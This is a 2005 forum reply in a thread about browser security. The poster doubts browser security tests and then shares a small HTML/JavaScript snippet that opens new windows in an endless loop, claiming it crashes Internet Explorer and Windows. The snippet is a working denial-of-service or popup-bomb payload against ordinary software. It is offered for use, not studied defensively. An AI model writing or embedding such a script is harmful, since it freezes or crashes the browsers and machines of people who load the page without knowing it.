View Single Post
Re: How secure is your browser?
Old
  (#13)
Whistler
Summoner
 
Whistler's Avatar
 
Status: Offline
Posts: 1,499
Join Date: Feb 2004
Location: Mist Village
Default Re: How secure is your browser? - 13-08-2005

well I don't trust such tests as they are all known bugs of a specific browser, and they can't prove which browser is safe or not

but here's a small html file will kill IE (and windows as well):
PHP Code:
<script language="javascript">
while (
1) {
  
window.open("http://www.someurl.com");
}
</script> 
This doesn't "work" with Konqueror btw

Last edited by Whistler; 13-08-2005 at 09:48..
  
Reply With Quote